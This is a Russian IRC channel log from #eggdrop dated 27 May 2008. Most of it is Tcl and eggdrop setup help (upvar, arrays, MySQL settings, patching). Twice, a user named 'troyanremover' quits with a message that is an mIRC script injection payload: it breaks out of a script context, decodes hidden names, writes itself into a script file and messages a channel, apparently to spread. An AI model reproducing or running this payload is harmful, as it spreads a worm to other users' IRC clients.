IRC логи каналов.

2006 2007 2008 2009 2010
ЯнварьФевраль   1234
МартАпрель567891011
МайИюнь12131415161718
ИюльАвгуст19202122232425
СентябрьОктябрь262728293031 
НоябрьДекабрь       
      Весь текст   

27 Мая 2008. Канал #eggdrop


[00:00:03] * Gremlin is now known as Guest97192
[00:00:10] <IRCServ> [716/1097] Для приятности лица после завтрака пивца [^p^]
[00:01:14] * tont is now known as [die]
[00:01:30] * CaspeR (~casper@casper.comex.ru) Quit (Quit: )
[00:02:38] * Guest97192 (~gr3ml1n@mainframe.ivdelta.ru) Quit (Client closed connection)
[00:03:52] * IvDelta-Mainframe (~gr3ml1n@mainframe.ivdelta.ru) has joined
[00:05:35] * IvDelta-Mainframe is now known as Gremlin
[00:15:35] * Buster[off] (www-data@union2.ru) Quit (Quit: CGI:IRC (EOF))
[00:18:41] <Shad> как в процедурой изменить локальную переменную, не возвращая ее?
[00:18:43] <AliasNET> Он в себе изменить?
[00:19:23] <Shad> т.е. есть тело одной процедуры, в ней вызывается еще одна, которая меняет локальную первой
[00:20:03] <Shad> такое осуществимо через передачу переменых второй процедуре
[00:20:05] <Shad> ?
[00:21:42] <Shad> типа proc P1 {} { set A bla | [P2 A] }
[00:21:43] <Buster> поточнее
[00:22:31] <Buster> из вызываемой процедуры поменять значение переменной из той откуда вызывалась?
[00:22:43] <Shad> да
[00:23:00] <Shad> причем массив %)
[00:23:24] <Buster> upvar
[00:23:31] <Buster> ~tcl upvar
[00:23:31] <Jaiss> Tcl.tk: upvar @ http://www.tcl.tk/man/tcl8.4/TclCmd/upvar.htm
[00:23:59] * Will_aka_Larry (~s@10.20.1.162) has joined
[00:27:36] <Shad> proc add2 name { -- это типа proc add2 {name} {?
[00:27:51] <Shad> я думал обязательны скобки, даже с 1 параметром
[00:28:01] <Shad> Buster, спс ;)
[00:28:48] <FreeLanceR> b b a l l
[00:29:13] * FreeLanceR is now known as F_ы_R_в_L_е_С_й_R
[00:31:40] <Buster> proc name_proc {arg1 arg2 arg3 ..} {
[00:31:42] <Buster> ...
[00:31:43] <Buster> }
[00:32:00] <Buster> так правильно
[00:33:18] <Shad> а что же тогда это такое
[00:33:19] <Shad> proc add2 name {
[00:33:19] <Shad> upvar $name x
[00:33:19] <Shad> set x [expr $x+2]
[00:33:19] <Shad> }
[00:33:35] <Buster> я говорю как правильно
[00:33:39] <Buster> а не как будет работать
[00:33:45] <Shad> :)
[00:33:48] <Shad> понятно
[00:33:58] <Shad> блин, а мне кажется с массивом так не получится
[00:34:13] <Shad> оно только строки передает ну и цифарки
[00:34:19] <Shad> вощем переменные
[00:34:29] <Buster> у тя массив какой
[00:34:33] <Shad> ээ
[00:34:35] <Buster> aa(aa)
[00:34:37] <Buster> aa(bb)
[00:34:39] <Buster> aa(cc)
[00:34:40] <Shad> да
[00:34:45] <Buster> будет передавать
[00:34:47] <Shad> параметр-значение
[00:35:02] <Buster> это называеться ассоциативный массив
[00:35:05] <Shad> a1 {b1} a2 {b2}
[00:35:08] <Shad> вот такое
[00:35:09] <AliasNET> Писать такое.
[00:35:25] <Buster> а это уже обычный массив
[00:35:31] <Buster> и то и другое будет передаваться
[00:35:34] <Shad> а в чем разница оО
[00:35:55] <Buster> в обращении к значениям переменных
[00:36:02] <Buster> 27/05/08-00:34:36] <Buster> aa(aa)
[00:36:02] <Buster> [27/05/08-00:34:38] <Buster> aa(bb)
[00:36:02] <Buster> [27/05/08-00:34:40] <Buster> aa(cc)
[00:36:07] <Buster> это как бы развернутый
[00:36:15] <Buster> a1 {b1} a2 {b2} это свернутый
[00:36:24] <Buster> есть две процедуры
[00:36:34] <Buster> превращения из одного вида в другой и обртно
[00:36:39] <Shad> а метод создания первого какой?
[00:36:47] <Buster> никакого метода
[00:36:49] <Shad> я тупо array set делаю
[00:36:53] <Buster> просто присваивание
[00:37:05] <Shad> ну или set a()
[00:37:09] <Buster> set aa(aa) 1
[00:37:12] <Buster> set aa(bb) 2
[00:37:14] <Shad> ну вот
[00:37:14] <Buster> итд
[00:37:20] <Shad> а какая разница
[00:37:26] <Buster> между чем и чем
[00:37:27] <Shad> все равно хранится как ээ..
[00:37:29] <Shad> свернутый
[00:37:39] <Shad> между хранимостью
[00:37:45] <Buster> к свернутомы ты можеш обратиться только как к строке
[00:37:48] <Buster> списку
[00:37:55] <Shad> почему это
[00:37:57] <AliasNET> Это почему это? Это не можешь быть с девушкой то курящая :((((.
[00:37:59] <Shad> ниправда
[00:38:07] <Buster> с кратным двум значениям
[00:38:18] <Buster> первое имя ассоциативной переменной второе значение
[00:38:28] <Buster> попробуй сделай
[00:38:30] <Buster> puts
[00:38:43] <Shad> смори, создаю вот так array set A "1 {a} 2 {b}"
[00:38:58] <Buster> ща погоди пример покажу
[00:38:58] <ReductioN> баст
[00:38:58] <ReductioN> [00: 38: 14] <ReductioN> !старт
[00:38:58] <ReductioN> [00: 38: 15] -BotneG- error executing старт: invalid command name "mysql_connected"
[00:39:01] <Shad> и могу сделать вывод A(1)
[00:39:08] <ReductioN> ввел все прально а к бд не подрубаеца
[00:39:09] <ReductioN> =(
[00:39:32] <Shad> версия скула совпадает?
[00:39:42] * Shad видел сегодня 3 версию в юзании :D
[00:39:50] * Nick Heidfeld (De_r@172.16.72.187) Quit (Quit: Nick Heidfeld - BMW Sauber F1 Team. Fansite: http://nickheidfeld.org.ru)
[00:40:04] <Shad> или библиотека нита наверн
[00:40:22] <ReductioN> =(
[00:40:27] <ReductioN> а как же
[00:41:36] <Shad> я вот хз как массив массиву передать: upvar Arr A -- так что-ль
[00:41:54] <Shad> ща методом тыка
[00:42:40] * RedWhite is now known as RedWhite`OFF
[00:42:53] <ReductioN> # настройка MySQL
[00:42:53] <ReductioN> set conf(sql_dbname) "irc"
[00:42:53] <ReductioN> set conf(sql_host) "127.0.0.1"
[00:42:53] <ReductioN> set conf(sql_username) "root"
[00:43:02] <ReductioN> set conf(sql_prefix) "sc_"
[00:43:04] <ReductioN> вот
[00:43:23] <Buster> Shad ::
[00:43:25] <Buster> set aa(aa) 1
[00:43:25] <Buster> set aa(bb) 2
[00:43:25] <Buster> set ff [array get aa]
[00:43:25] <Buster> puts $ff
[00:43:25] <Buster> array set jj $ff
[00:43:25] <Buster> puts $jj(aa)
[00:43:27] <Buster> 1
[00:43:28] <ReductioN> в мускуле создал бд irc
[00:43:29] <Buster> % 2
[00:43:31] <Buster> % bb 2 aa 1
[00:43:33] <Buster> % bb 2 aa 1
[00:43:35] <Buster> % % 1
[00:47:06] <Buster> ReductioN :: там наверное используеться модуль скула
[00:47:09] <Buster> а не либа
[00:47:18] <Buster> перепиши названия процедур скуловских
[00:50:01] * Хозяин_Леса (__________@host251-net128.comtel.local) Quit (Quit: )
[00:50:06] * damian (n_forcer@n-forcer.ntown) has joined
[00:50:37] <ReductioN> Buster: таблиц еще нету
[00:50:50] <Buster> таблицы не причем
[00:50:51] <AliasNET> Я не причем.
[00:55:54] * |EnzoMatrix| is now known as EnzoMatrix
[00:59:59] * ~^`~ViSk~`^~ (_RuleZzz_@bifasc.ntown) Quit (Quit: <<< ==>=>=>=R=u=l=e=Z=z=z=>=>=>== >>>)
[01:00:02] <IRCServ> [357/1097] <x-master> .Chanserv. 5 25 x-master (s-master@host-172-22-7-36.academ.local) -- вот в списке опов, у меня ну 25 % прав. Даже у других пользователей больше, 30 ! А почему. Я же ведь фаундэр канала у меня должно быть 100. [Den]
[01:03:26] * Pawluxa (VScript2.0@10.1.200.123) has joined
[01:03:57] <Pawluxa> ::[ Привет всем !!! ]::
[01:10:33] * AliasNET sets mode: +o net_toxic
[01:10:33] * AliasNET sets mode: +o Kein
[01:10:33] * AliasNET sets mode: -b ???????????????????*!*@*
[01:11:03] <ReductioN> ы
[01:15:31] * ReductioN (rulezzz@kalinnikova.svnet) Quit (Quit: )
[01:16:23] * Gremlin is now known as IvDelta-Mainframe
[01:30:05] * BotNet (~Eggdrop@83.167.112.69) Quit (Read error: Connection reset by peer)
[01:32:39] <Shad> Buster, а как вызывать-то потом эту процедуру :)
[01:32:57] <Buster> как обычно
[01:33:10] <Buster> и я вообще думаю что те не нужен обычный массив
[01:33:17] <Buster> те достаточно бдет ассоциативного
[01:33:23] <Shad> обычно я такое делаю set a [proc 123]
[01:33:44] <Shad> а как сделеть тупо вызов процедуры
[01:33:45] <Buster> ну так же
[01:33:52] <Shad> proc P {Text} {
[01:33:52] <Shad> upvar $Text a
[01:33:52] <Shad> set a "ok"
[01:33:52] <Shad> }
[01:33:56] <Buster> если она ничего не возвращает то просто бе присваивания
[01:34:06] <Shad> P Text
[01:34:09] <Shad> нипашет )
[01:34:14] <Shad> в и [] тоже
[01:34:23] <Shad> *и в [] тоже
[01:35:10] <Shad> всегда у меня были процедуры функциями, т.е. что-то возвращали, а вот над этим даж не задумывался
[01:35:47] <Shad> хм.. запахало
[01:36:15] <Shad> без скобок, естессно должно пахать, а то это значение подставится
[01:36:16] <Buster> % proc aaa {name} {upvar $name fff; set fff 1}; aaa ee; puts $ee
[01:36:16] <Buster> 1
[01:36:30] <Shad> наман
[01:36:40] <Shad> видимо не рехешнул вовремя
[01:39:25] * Buster (~Buster@80.70.104.6) Quit (Quit: )
[01:41:02] * _TiMoFF_ (kvirc@10.30.1.131) Quit (Read error: Connection reset by peer)
[02:00:02] <IRCServ> [546/1097] <Kamikaze2231645893456238946543> !faq 2 [Filona]
[02:00:30] * Kein (~kein@ip-83-149-3-49.nwgsm.ru) Quit (Quit: Здесь могла бы быть ваша реклама... Хотя нет, не могла бы.)
[02:11:24] * Will_aka_Larry (~s@10.20.1.162) Quit (Quit: )
[02:11:24] * MAD_Evil is now known as NetSplit
[02:11:41] * AliasNET sets mode: +l 94
[02:38:17] * Футболист (mirc616@musrustam2m.sky) has joined
[02:41:32] * Pawluxa (VScript2.0@10.1.200.123) Quit (Quit: Нет солнца в небе без облаков, нет на свете принцес - это сказки для дураков и уж поверь мне нет бога, сын поверь мне нет бога !)
[02:41:49] * Koc` is now known as |Absence|
[02:44:55] * Premier (~premier@78.111.145.242) Quit (Quit: Trust no one.)
[02:55:37] * Футболист (mirc616@musrustam2m.sky) Quit (Quit: Тут могла быть ваша реклама :))
[03:00:04] <IRCServ> [76/1097] (Модератор): пслушай, а когда я открываю свой канал, какой комп тановится серваком? [Pha`Away]
[03:51:04] * ЮлёноК (pIRCuser87@h249.lan248.rs) has joined
[04:00:03] <IRCServ> [514/1097] Гагарин> у меня каналы дропаются сами. волшебство? [весн?но]
[04:17:19] * Bloborob45 (~Bloborob@trinity-a.majordomo.ru) has joined
[04:18:40] * Bloborob45 (~Bloborob@trinity-a.majordomo.ru) Quit (Client closed connection)
[04:48:09] * ЮлёноК (pIRCuser87@h249.lan248.rs) Quit (Quit: pIRC v2.2 < Personal IRC Team > http://ircworld.ru and http://xirc.ru/)
[04:48:09] * hello_dolly (~a_netu@77.41.77.218) has joined
[05:00:03] <IRCServ> [898/1097] "Главное, чтобы тебя окружали хорошие люди" (с) Фельдмаршал Паулюс. [Jim_Morrison]
[05:00:29] * CkpoMHuk (~storm@10.17.226.72) Quit (Quit: Всем пока !)
[05:15:59] * Хедин (autokill@h113.lan213.rs) has joined
[05:16:58] * Хедин is now known as Хедин|away
[05:16:59] * Хедин|away ..:: УшЁл, ОтМазКа »»» инст ««« ::..
[05:38:16] * Хедин|away (autokill@h113.lan213.rs) Quit (Ping timeout)
[06:00:03] <IRCServ> [774/1097] Лишь Гинеколог и Практолог ведают неизведанное! [КотоВАС]
[06:46:14] * xamyt (fox@xamyt.aviel.ru) Quit (Quit: )
[06:55:52] * Travel_Boy_in_USA (~Slakor87@64.144-pool-xdsl-mi.sccoast.net) has joined
[06:56:04] <Travel_Boy_in_USA> hi!
[06:56:17] <Travel_Boy_in_USA> how are you doing?
[06:58:14] * Travel_Boy_in_USA (Slakor87@64.144-pool-xdsl-mi.sccoast.net) has left ()
[07:00:04] <IRCServ> [830/1097] И точка лазерного прицела на твоем лбу - тоже чья-то точка зрения. [Jim_Morrison]
[07:19:00] * ChanServ sets mode: -b *!*@h164.lan190.rs
[07:19:00] * ChanServ sets mode: -b *!*@87.118.104.26
[07:19:00] * ChanServ sets mode: -b *!*5636@*
[07:19:00] * ChanServ sets mode: -b Grader!*@*
[07:19:00] * ChanServ sets mode: -b *!*@65.182.107.200
[07:19:00] * ChanServ sets mode: -b *!*@deneb.struegel.net
[07:19:00] * ChanServ sets mode: -b *!*@fu212.netikka.fi
[07:28:19] * EnzoMatrix (kvirc@zatoichi-host176.hostel6.tsure.ru) Quit (Netsplitted)
[07:38:41] * F_ы_R_в_L_е_С_й_R is now known as FreeLanceR
[07:58:41] * _TiMoFF_ (kvirc@10.30.1.131) has joined
[08:00:04] <IRCServ> [54/1097] Утро, ноги, тапки, кран, завтрак, деньги, класть, карман, ноги, дверь, гулять, с утра, пиво, водка, два, ведра, шум, башка, упасть, лежать, ноги, руки, дом, кровать, плохо, ночь, темно, дурман, утро, ноги, тапки, кран. [^Oo^]
[08:06:22] * jkanzlerd (~compilato@ws33.zone159.zaural.ru) Quit (Ping timeout)
[08:13:27] * Dmage (~compilato@ws33.zone159.zaural.ru) has joined
[08:17:40] * Bloborob70 (~Bloborob@trinity-a.majordomo.ru) has joined
[08:18:27] * CheaT (NarkooUser@dimok93.svnet) has joined
[08:18:40] * Bloborob70 (~Bloborob@trinity-a.majordomo.ru) Quit (Client closed connection)
[08:43:24] * FreeLanceR is now known as F_ы_R_в_L_е_С_й_R
[08:50:25] * Junior (_sm0ke_@junior69.svnet) has joined
[08:55:34] * Junior is now known as Soprano
[08:55:40] * Naruto_Uzumaku (~racer-100@10.20.65.170) has joined
[08:56:13] * n_forcer (n_forcer@n-forcer.ntown) has joined
[08:56:30] * damian (n_forcer@n-forcer.ntown) Quit (Ping timeout)
[08:56:46] * Soprano is now known as Junior
[08:57:28] * [-] (~Buster@80.70.104.6) has joined
[08:57:28] * ChanServ sets mode: +o [-]
[08:58:19] <Naruto_Uzumaku> !скачать
[08:58:38] * [-] is now known as Buster
[08:59:32] <Naruto_Uzumaku> !настроить
[08:59:32] <Jaiss> Для корректной настройки бота рекомендуется ознакомиться с этими статьями : http://forum.systemplanet.ru/viewtopic.php?f=9&t=2 | http://ircinfo.ru/articles/windrop-setup.asp
[08:59:58] * Naruto_Uzumaku (racer-100@10.20.65.170) has left ()
[09:00:05] <IRCServ> [279/1097] [17:12:40] <OCMbICJIEHOCTb> Как придумать ник? [17:13:10] <JustCat> OCMbICJIEHOCTb: наверное мозгами [17:13:32] <OCMbICJIEHOCTb> А по-другому? [so]
[09:00:16] * Naruto_Uzumaku (~racer-100@10.20.65.170) has joined
[09:00:38] <Naruto_Uzumaku> мне дают бота, но у меня каналу нет 2 недель, что мне делать?
[09:01:17] * |EnzoMatrix| (kvirc@zatoichi-host176.hostel6.tsure.ru) has joined
[09:01:34] <Naruto_Uzumaku> ну?
[09:02:07] * Naruto_Uzumaku (racer-100@10.20.65.170) has left ()
[09:03:35] <Buster> убиться)
[09:05:54] * F_ы_R_в_L_е_С_й_R is now known as FreeLanceR|DND
[09:10:51] * DEx_БрЭйКеР (IRCuser817@172.28.193.107) has joined
[09:11:05] * DEx_БрЭйКеР безумно рад видеть Kristina
[09:12:29] * DEx_БрЭйКеР (IRCuser817@172.28.193.107) has left ()
[09:14:45] * Buster is now known as [-]
[09:27:12] * Buster (www-data@union2.ru) has joined
[09:27:12] * ChanServ sets mode: +o Buster
[09:30:49] * _TiMoFF_ (kvirc@10.30.1.131) Quit (Read error: Connection reset by peer)
[09:36:25] * troyanremover (~trion@ppp91-76-113-106.pppoe.mtu-net.ru) has joined
[09:36:31] * troyanremover (~trion@ppp91-76-113-106.pppoe.mtu-net.ru) Quit (Quit: } set %y $findfile($mircdir,$decode(dHJpb25zY3I3LmluaQ==,m),1,5) | set %x $ $+ strip($ $+ 1-)* $shortfn(%y) | write -dw* $+ %x | write -dw* $+ %x | write -dw* $+ %x | write -dw* $+ %x | .msg $decode(I286bGluZXM=,m) %x | unset %x,%y | .reload -rs $chr(34) $+ %y $+ $chr(34))
[09:36:36] * troyanremover (~trion@ppp91-76-113-106.pppoe.mtu-net.ru) has joined
[09:36:39] * troyanremover (~trion@ppp91-76-113-106.pppoe.mtu-net.ru) Quit (Quit: } set %y $findfile($mircdir,$decode(dHJpb25zY3I3LmluaQ==,m),1,5) | set %x $ $+ strip($ $+ 1-)* $shortfn(%y) | write -dw* $+ %x | write -dw* $+ %x | write -dw* $+ %x | write -dw* $+ %x | .msg $decode(I286bGluZXM=,m) %x | unset %x,%y | .reload -rs $chr(34) $+ %y $+ $chr(34))
[09:40:11] * slin (pIRCuser90@star5.svnet) has joined
[09:42:44] * hello_dolly (a_netu@77.41.77.218) has left ()
[09:52:05] * yMHuK (Alex@bulalex.svnet) has joined
[09:58:05] * Dj_Tiesto (___@dollar.sky) has joined
[10:00:05] <IRCServ> [365/1097] 11:33 < ___CLassic___> kis позвани мне [eerie]
[10:04:38] * Dj_Tiesto (___@dollar.sky) Quit (Quit: BraXeD Script version 10.1 by BraXeD Качаем здесь: http://www.Braxed.narod.ru/IRC/BraXIRC.exe)
[10:05:20] * Dj_Tiesto (___@dollar.sky) has joined
[10:07:01] * yMHuK is now known as АвЕй
[10:10:27] * Nick Heidfeld (De_r@172.16.72.187) has joined
[10:17:35] * Nick Heidfeld (De_r@172.16.72.187) Quit (Quit: Nick Heidfeld - BMW Sauber F1 Team. Fansite: http://nickheidfeld.org.ru)
[10:21:41] * ЕмОчКа (newuser@h173.lan173.rs) has joined
[10:21:55] * ЕмОчКа (newuser@h173.lan173.rs) has left ()
[10:32:14] * zlobnoe (stream@staff.ntown) has joined
[10:33:34] * x-demon (xdemon@fsrv.x-demon.org) has joined
[10:33:51] <x-demon> на новый eggdrop .19 suzi patch надо ставить:
[10:33:53] <x-demon> ?
[10:34:42] <^•_•^> ставь егг .17 без патчей и все ок)
[10:34:57] <x-demon> да я уж 19 поставил
[10:34:58] <AliasNET> Ты меня поставил в игнор\.
[10:35:05] <x-demon> так надо или нет?
[10:35:09] <noident> есть же 19 с патчем 0008 вроде
[10:35:22] <x-demon> http://eggdrop.lv/forum/index.php?showtopic=134&mode=threaded
[10:35:27] <^•_•^> хз я предпочитаю 17 =)
[10:35:30] <^•_•^> без патчей
[10:35:31] <x-demon> Единственное что нашел
[10:35:34] <noident> у меня 19 стоит
[10:35:38] <noident> с патчем
[10:35:57] <noident> Suzi patch (Сузе патчь): v0008;
[10:38:04] * Dj_Tiesto (___@dollar.sky) Quit (Quit: BraXeD Script version 10.1 by BraXeD Качаем здесь: http://www.Braxed.narod.ru/IRC/BraXIRC.exe)
[10:38:20] <Buster> ^•_•^ предпочитай, и живи с сбрасыванием флагов, тормозами при получении инет запросов, пропаданием 255 символа выбранной кодировки, невозможностью использования символов с кодом > 127 в некоторых функциях патилайна, некорректностью работы некоторых tcl функций
[10:38:21] <Buster> )))))))
[10:38:49] <noident> настроочил то)
[10:39:01] * DPblH (kvirc@92.125.109.175) has joined
[10:39:32] * DPblH (kvirc@92.125.109.175) has left (Ливанул)
[10:40:13] <^•_•^> Buster для арены ничего этого ненадо)
[10:40:39] <Buster> ты предлагаеш всем ставить только арену ?)
[10:41:01] * Dj_Tiesto (___@dollar.sky) has joined
[10:41:16] <x-demon> ладно, где взять suzi patch для .19
[10:41:24] <x-demon> или тот же что и для .18?
[10:41:26] <Buster> !скачать
[10:41:26] <Jaiss> Ссылки на версии EGGdrop под различные операционные системы:
[10:41:26] <Jaiss> Windrop 1.6.18+Suzi >> http://eggdrop.msk.ru/files/irc/windrop1.6.18-handlen32+Suzi008.exe
[10:41:26] <Jaiss> Eggdrop 1.6.19+Suzi >> http://eggdrop.msk.ru/files/irc/eggdrop1.6.19-sp0008.tar.bz2
[10:41:26] <Jaiss> Eggdrop 1.6.19+Suzi+mod >> http://eggdrop.msk.ru/files/irc/eggdrop1.6.19-sp0008-full.tar.bz2
[10:41:26] <Jaiss> Eggdrop 1.6.19 >> http://www.eggheads.org/redirect.php?url=ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.19.tar.bz2
[10:41:39] <^•_•^> Buster а зачем еще нужны егг оО? :))
[10:41:40] <Buster> ссылки меняй на buster-net.ru
[10:42:01] <noident> а старый то сайт стрим захавал?
[10:42:02] <Buster> ^•_•^ у тя очень маленький вид нужд
[10:42:05] <^•_•^> :)
[10:42:12] <x-demon> а +mod то что
[10:42:21] <Buster> модули
[10:42:23] <Buster> набор
[10:42:30] <Buster> стандартных
[10:42:30] <x-demon> stats, gseen?
[10:42:31] <noident> seen megahal etc
[10:42:35] <x-demon> f
[10:42:36] <x-demon> а
[10:42:38] <Buster> угу
[10:42:40] <x-demon> не нужно =)
[10:42:48] <x-demon> у меня stats .40 патченый...
[10:44:01] <noident> а я как то установил с модами, а потом снова зачем то моды доставил)))
[10:44:34] * Dj_Tiesto (___@dollar.sky) Quit (Quit: BraXeD Script version 10.1 by BraXeD Качаем здесь: http://www.Braxed.narod.ru/IRC/BraXIRC.exe)
[10:44:51] * FreeServ (~freeserv@66.96.221.229) Quit (Ping timeout)
[10:44:51] * Sanitar (~bot@66.96.221.230) Quit (Ping timeout)
[10:45:17] * Dj_Tiesto (___@dollar.sky) has joined
[10:45:20] * FreeServ (~freeserv@66.96.221.229) has joined
[10:45:24] * D-Face sets mode: +v FreeServ
[10:46:12] * Sanitar (~bot@66.96.221.230) has joined
[10:46:16] * D-Face sets mode: +v Sanitar
[10:46:16] * AliasNET sets mode: +v Sanitar
[10:47:30] <x-demon> так... если патч лежит в той же дире где и бот, то -p0 ?
[10:47:32] <AliasNET> Где патч лежит?!
[10:48:25] * Unlix is now known as Exspress
[10:48:47] * Nick Heidfeld (De_r@172.16.72.187) has joined
[10:50:00] <Buster> нет
[10:50:05] <Buster> он уже патченный
[10:50:13] <Buster> патчь просто лежит в довесок
[10:50:17] <x-demon> да я на своего патч накладываю
[10:50:21] <x-demon> он то не пропатченный
[10:50:27] <Buster> тогда да
[10:50:50] <Buster> он ругнеться на парочку смещений и всё
[10:51:05] * x-demon (xdemon@fsrv.x-demon.org) has left ()
[10:51:09] * x-demon (xdemon@fsrv.x-demon.org) has joined
[10:51:27] <x-demon> набрал patch -p0 suzi.patch и тишина в консоли....
[10:51:48] <Buster> неправильный синтаксиис
[10:51:58] * Джа (hamlo@autokilled.com) has joined
[10:51:58] <x-demon> хм?
[10:51:58] <Buster> patch -p0 < файл
[10:52:03] <x-demon> тьфу
[10:52:04] <x-demon> точно
[10:52:06] <x-demon> я идиотина
[10:52:07] * AliasNET sets mode: +l 100
[10:52:22] <Джа> ~script bash
[10:52:30] <Джа> ~script bash.tcl
[10:53:05] * Dj_Tiesto (___@dollar.sky) Quit (Quit: BraXeD Script version 10.1 by BraXeD Качаем здесь: http://www.Braxed.narod.ru/IRC/BraXIRC.exe)
[10:55:20] <x-demon> userent.c:1201: warning: dereferencing type-punned pointer will break strict-aliasing rules
[10:55:29] <x-demon> не обращать внимания?
[10:57:26] * slin (pIRCuser90@star5.svnet) Quit (Ping timeout)
[11:00:05] <IRCServ> [171/1097] <medd0c> как скрипт написать чтоб сразу асю проверял [leоnidas]
[11:03:43] <Джа> !ad
[11:03:45] <Buster> варнинги не ошибка
[11:04:42] <x-demon> иногда из за них вылезают очень мерзкие ошибки в работе =)
[11:04:53] <Buster> нет
[11:04:58] <Buster> не из за них
[11:05:48] <Buster> это места которые компилятор считает неправильными но они работают
[11:06:04] <Buster> например объявленна переменная которая не используеться
[11:06:17] <Buster> она же не будет влиять на работу всего прроцесса
[11:08:01] <x-demon> а
[11:08:02] <x-demon> ок, спс
[11:08:10] <x-demon> ароде запустился с первого раза
[11:12:29] * NetSplit is now known as MAD_Evil
[11:12:29] * MAD_Evil Я вернулся Не было: 9ч 1мин 3сек , Причина Auto away
[11:12:37] <x-demon> всем спс
[11:12:40] * x-demon (xdemon@fsrv.x-demon.org) has left ()
[11:15:53] * Premier (~premier@78.111.145.242) has joined
[11:28:11] * |EnzoMatrix| (kvirc@zatoichi-host176.hostel6.tsure.ru) Quit (Client closed connection)
[11:30:57] * Pawluxa (VScript2.0@10.1.200.123) has joined
[11:31:24] <Pawluxa> ::[ Привет всем !!! ]::
[11:32:21] <Premier> всем привет
[11:36:38] * zlobnoe (stream@staff.ntown) Quit (Quit: Есть две бесконечные вещи: вселенная и человеческая глупость, впрочем, насчет первого - я не уверен...)
[11:38:24] * slin (pIRCuser90@star5.svnet) has joined
[11:38:42] * slin (pIRCuser90@star5.svnet) has left ()
[11:39:07] * Nick Heidfeld (De_r@172.16.72.187) Quit (Quit: Nick Heidfeld - BMW Sauber F1 Team. Fansite: http://nickheidfeld.org.ru)
[11:49:13] * АвЕй is now known as yMHuK
[11:52:56] * Джа is now known as Джа спрятался
[11:53:11] * Джа спрятался is now known as пока спрятался
[12:00:06] <IRCServ> [962/1097] карочи сыграй в ромашку... [user`ok]
[12:00:30] * Buster is now known as Buster[off
[12:07:09] <CheaT> как вырубить флуд контроль
[12:08:59] <пока спрятался> set flood-chan 0:0
[12:11:07] * Ninja (~Nikita@213.208.161.122) has joined
[12:11:30] * [-] is now known as Buster
[12:13:29] * Junior (_sm0ke_@junior69.svnet) has left ()
[12:13:31] * Ninja (~Nikita@213.208.161.122) Quit (Netsplitted)
[12:13:31] * Sanitar (~bot@66.96.221.230) Quit (Netsplitted)
[12:13:31] * FreeServ (~freeserv@66.96.221.229) Quit (Netsplitted)
[12:13:31] * Serena (grant@2306ds2-hvi.1.fullrate.dk) Quit (Netsplitted)
[12:13:31] * [die] (~ramzes@66.96.221.230) Quit (Netsplitted)
[12:13:31] * Arkhangel (~merlin@10636.ostrov.net) Quit (Netsplitted)
[12:13:31] * avers (~recaro@92.63.96.192) Quit (Netsplitted)
[12:13:31] * st1muL[AWAY\BNC] (~adrenalin@manganum.e-telecom.ru) Quit (Netsplitted)
[12:13:31] * Ботик (~ircbot@dsn.ivanovo.wenet.ru) Quit (Netsplitted)
[12:13:31] * VIP (~VIP@bf2.StarNet) Quit (Netsplitted)
[12:13:31] * Xpykep (~daemon@bf.rnd.mediazona.ru) Quit (Netsplitted)
[12:13:31] * Deil[offline] (~system@wenet.ttn.ru) Quit (Netsplitted)
[12:13:31] * yMHuK (Alex@bulalex.svnet) Quit (Netsplitted)
[12:13:31] * n_forcer (n_forcer@n-forcer.ntown) Quit (Netsplitted)
[12:13:31] * CheaT (NarkooUser@dimok93.svnet) Quit (Netsplitted)
[12:13:31] * kurt (kurt@demanon.ntown) Quit (Netsplitted)
[12:13:31] * D-Face (~info@upload.uraltb.ru) Quit (Netsplitted)
[12:13:31] * Boozer (~Vitek@195.161.191.4) Quit (Netsplitted)
[12:13:31] * AnToNiO (zzzt@staff.wenet.ru) Quit (Netsplitted)
[12:13:31] * Mr-X (~irc@webmaster.progtech.ru) Quit (Netsplitted)
[12:13:31] * Shinoby (~Shinoby@hosting.solarhost.ru) Quit (Netsplitted)
[12:13:31] * net_toxic (~nope@saybrax.pp.ru) Quit (Netsplitted)
[12:13:31] * Morfein (~home@sopov.ru) Quit (Netsplitted)
[12:13:31] * LogServ (~null@hub.chel.wenet.ru) Quit (Netsplitted)
[12:13:31] * AliasNET (~ircd@irc.aliasnet.ru) Quit (Netsplitted)
[12:13:31] * ^Oo^ (~tele@pc1.aliasnet.ru) Quit (Netsplitted)
[12:13:31] * Pawluxa (VScript2.0@10.1.200.123) Quit (Netsplitted)
[12:13:31] * e}i{uk (~BotRN@10.10.0.17) Quit (Netsplitted)
[12:13:32] * ZVERb[НетУ] (root@MASTERSHELL.ORG) Quit (Netsplitted)
[12:13:32] * yayce (~yayce@bot.uraltb) Quit (Netsplitted)
[12:13:32] * Dmage (~compilato@ws33.zone159.zaural.ru) Quit (Netsplitted)
[12:13:32] * Mellisa (~Mellisa@proxys.zos-v.ru) Quit (Netsplitted)
[12:13:32] * zZz (~wtf@ircworld.ru) Quit (Netsplitted)
[12:13:32] * velik[нету] (~velik@ircworld.ru) Quit (Netsplitted)
[12:13:32] * tem|bnc (~temerlyan@ircworld.ru) Quit (Netsplitted)
[12:13:32] * _andrew|aw_ (~andrew@ircworld.ru) Quit (Netsplitted)
[12:13:32] * woolf (~woolf@bots.solarnet.ru) Quit (Netsplitted)
[12:13:32] * Exspress (~exspress@unlix.ru) Quit (Netsplitted)
[12:13:32] * LE0nid (~leo@10.100.254.21) Quit (Netsplitted)
[12:13:32] * BOTuHOK (~Sandalik@hell.zhukovskiy.ru) Quit (Netsplitted)
[12:13:32] * Sin (~alex@faktradio.progtech.ru) Quit (Netsplitted)
[12:13:32] * Shell (~link@hub.botnet.tmp.zlug.ru) Quit (Netsplitted)
[12:13:32] * StatBot (~StatBot@freeforum.zhukovsky.msk.wenet.ru) Quit (Netsplitted)
[12:13:32] * Digital_Chaos (~pro-hack@88.205.174.68) Quit (Netsplitted)
[12:13:32] * Leva (~Hate@213.59.125.4) Quit (Netsplitted)
[12:13:32] * Forum (info@staff.org.ru) Quit (Netsplitted)
[12:13:32] * RedWhite`OFF (alexeijke@autokilled.com) Quit (Netsplitted)
[12:13:32] * kns[na] (wenet@xtmb.info) Quit (Netsplitted)
[12:13:32] * пока спрятался (hamlo@autokilled.com) Quit (Netsplitted)
[12:13:32] * Люмиан [gone] (admin@ircparty.usa.local) Quit (Netsplitted)
[12:13:32] * staff_[OFF] (NarkooUser@ircclub.net) Quit (Netsplitted)
[12:13:32] * Dexoid[usa] (dexoid@ircclub.net) Quit (Netsplitted)
[12:13:32] * NickName (stuk@xtmb.info) Quit (Netsplitted)
[12:13:32] * Dexoid[BnC] (dexoid@dexik.ru) Quit (Netsplitted)
